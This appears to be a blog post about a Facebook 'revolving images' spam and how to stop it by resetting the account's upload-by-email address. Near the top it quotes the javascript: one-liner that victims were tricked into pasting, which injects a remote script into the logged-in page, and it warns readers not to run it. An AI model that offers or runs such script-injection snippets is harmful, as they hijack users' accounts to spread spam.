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Get Rid Of The “Revolving Images” Spam On Facebook

f you are reading this post then I’m assuming that you happen to be one of those unfortunate users who unknowingly copy pasted the following script into their browser address bars hoping to see revolving images on Facebook. If I happen to be wrong and you are not even remotely aware of anything I’m saying then do not under any circumstances use the script below.
1javascript:(a = (b =  document).createElement("script")).src =   "//", b.body.appendChild(a); void(0)
Chances are that the spam has started to become a PITA and you want to get rid of it. But how? It’s fairly easy and was pointed out to me by one of my readers, Zahid. Great guy I must say. If this solution works for you then do thank him in the comments. He deserves it.
The spam is making wall posts and is updating users’ status’. To do this, it is using the a not so newly launched Facebook feature called “Upload Via E-mail”. It is a unique personal Email address given to every user which allows one to post status updates or send photos and videos straight to one’s profile. The spam has recorded this Email address of yours and is using it to update your status. Thankfully, Facebook lets you change this E-mail ID. This is how you can do it.
Step 1: Go over to
Find “More Facebook Mobile Products” written somwhere down. Find “Upload Via Email“. Click “Find out more“.
Step 2: Now look at the image below and click exactly where it says “..refresh your upload email.” or exactly where you see the cursor in the image.
Step 3: Now press reset. Don’t worry, your computer will not crumble to pieces. At least, not yet.
Step 4: If you see an image something like this (below) then you are done for the day. The spam won’t work anymore.
And please don’t go about entering random JavaScript in your browsers anymore.
Lesson for day for you: JavaScript can be very malicious.

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